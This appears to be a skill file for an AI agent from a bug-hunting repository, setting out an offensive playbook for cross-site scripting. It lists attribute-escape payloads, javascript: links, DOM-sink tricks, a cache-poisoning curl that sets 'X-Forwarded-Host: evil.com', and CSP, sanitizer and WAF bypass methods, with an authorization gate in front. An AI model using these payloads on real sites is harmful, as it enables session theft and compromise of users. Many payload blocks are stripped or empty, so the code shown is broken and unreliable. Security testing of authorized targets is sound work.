--- name: hunt-xss description: Hunting skill for xss vulnerabilities. category: security risk: offensive source: https://github.com/elementalsouls/Claude-BugHunter source_repo: elementalsouls/Claude-BugHunter source_type: community date_added: '2026-09-20' license: MIT license_source: https://github.com/elementalsouls/Claude-BugHunter/blob/main/LICENSE compatibility: Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled. sources: github, hackerone_public report_count: 174 --- > **⚠️ AUTHORIZED USE ONLY** > This skill is for educational purposes or authorized security assessments only. > You must have explicit, written permission from the system owner before using this tool. > Misuse of this tool is illegal and strictly prohibited. > **Mandatory confirmation gate** > Before running any command that probes, exploits, changes, persists on, extracts data from, or attempts credential access against a target: > 1. Ask the user to state the exact target URL, IP, account, or resource. > 2. Ask the user to confirm written authorization and the permitted scope. > 3. Show the exact command(s) and explain their expected effect. > 4. Wait for explicit confirmation in the current conversation. > > Without that confirmation, remain read-only and provide defensive guidance only. Prefer a sandbox, disposable VM, or controlled lab. ## Autonomous Testing Priority **Verify reflection before claiming XSS — encoding is everything.** Your payload must appear in the response body with angle brackets UNESCAPED. `` or `">`. Pick a distinctive 4+ digit number, not `alert(1)`. Practice pages are full of *example* payloads like `alert(1)`/`alert('XSS')` in their hint text; a unique number is how you tell YOUR reflected payload apart from the page's decoy examples. Proof = your `alert()` shows up in the response with raw, unescaped angle brackets. **Try these contexts in order:** 1. **Inline script injection** (works when HTML context allows new tags): ``` ``` Use whatever canary string your proof contract specifies. Confirmed when ` ?q="> ?utm_source= ?redirect=javascript:alert(document.domain) ``` **Attribute context escapes:** ```html " onmouseover="alert(1) ' onmouseover='alert(1) `onmouseover=alert(1) ``` **SVG-based (CSP bypass):** ```html ``` **Sanitizer bypass — math+style combo:** ```html ``` **Sanitizer bypass — svg+style combo:** ```html ``` **Markdown/RDoc javascript: link:** ```markdown [Click me] (javascript:alert(document.domain)) ``` **Kroki/diagram injection:** ``` ```kroki plantuml @startuml :; @enduml ``` ``` **DOM XSS via hash/search:** ```javascript // In browser console to test sink location.hash = '#">' location.href = 'https://target.com/page#' ``` **Grep patterns for source review:** ```bash # Find dangerous sinks in JS grep -rn "innerHTML\|document\.write\|eval(\|setTimeout(\|location\.hash\|location\.search" --include="*.js" # Find unsafe Rails helpers grep -rn "html_safe\|raw(\|sanitize\|translate" --include="*.erb" --include="*.rb" # Find reflected params in responses grep -i "utm_source\|utm_medium\|redirect\|return_url\|callback\|next" --include="*.html" -r ``` **Curl to detect reflection:** ```bash curl -sk "https://target.com/search?q=XSSCANARY" | grep -i "XSSCANARY" curl -sk "https://target.com/page?utm_source=XSSCANARY" | grep -i "XSSCANARY" ``` **Cache poisoning test:** ```bash # Send payload then fetch with clean session to see if cached curl -sk "https://target.com/page?param=" -H "X-Forwarded-Host: evil.com" curl -sk "https://target.com/page" | grep -i "evil.com" ``` --- ## Common Root Causes 1. **Trusting `html_safe` in Rails** — Developers mark strings as safe after partial sanitization, or chain `.html_safe` on user-supplied data without full sanitization. 2. **Allowlist sanitizers with dangerous tag combinations** — Allowing `style` alongside `math` or `svg` creates mXSS (mutation XSS) opportunities even when individual tags seem harmless. 3. **Third-party rendering pipelines** — Markdown-to-HTML pipelines (Banzai, Kramdown, Kroki) introduce XSS when diagram/rendering engines aren't sandboxed and output isn't re-sanitized. 4. **Reflecting URL parameters without encoding** — UTM params, redirect URLs, and search terms are reflected in page HTML or JS without proper HTML-encoding, especially on marketing/help pages that are treated as lower-security. 5. **SVG treated as non-script content** — Developers apply CSP to HTML responses but forget that `image/svg+xml` responses can execute JavaScript and often aren't covered by the same CSP header. 6. **Incomplete sanitizer patches** — CVE-patched sanitizers are bypassed by slight variations (e.g., CVE-2022-32209's incomplete fix demonstrates that sanitizer logic is difficult to get right, creating bypass chains). 7. **`javascript:` scheme not blocked in href/src** — Link renderers (RDoc, Markdown) fail to block `javascript:` URLs in href attributes, treating them as valid external links. 8. **Cache layers storing authenticated user input** — CDN or reverse proxy caches store responses containing user-controlled XSS payloads, serving them to subsequent unauthenticated users. 9. **File upload without Content-Type enforcement** — Accepting SVG or HTML files and serving them without forcing `Content-Disposition: attachment` or overriding Content-Type. 10. **Translation helper XSS** — Rails `translate`/`t()` helper marks translation strings as HTML-safe and interpolates user input, enabling injection through locale keys. --- ## Bypass Techniques **CSP Bypass:** - SVG uploads bypass script-src because `image/svg+xml` responses may not inherit the page's CSP - Find JSONP endpoints on whitelisted domains (`*.googleapis.com`, `*.cloudflare.com`) - Use `` tag injection to redirect script sources - Exploit `unsafe-eval` or `unsafe-inline` in style-src to execute CSS-based attacks - `` or `` gadgets to bypass strict policies **Sanitizer Bypasses:** - **mXSS (Mutation XSS):** Inject HTML that's safe when parsed by sanitizer but mutates when re-parsed by browser (e.g., ``) - **Tag combination attacks:** `` + `
``` **WAF Bypass:** ```javascript // Obfuscated payloads // String splitting // HTML5 event handlers that WAFs miss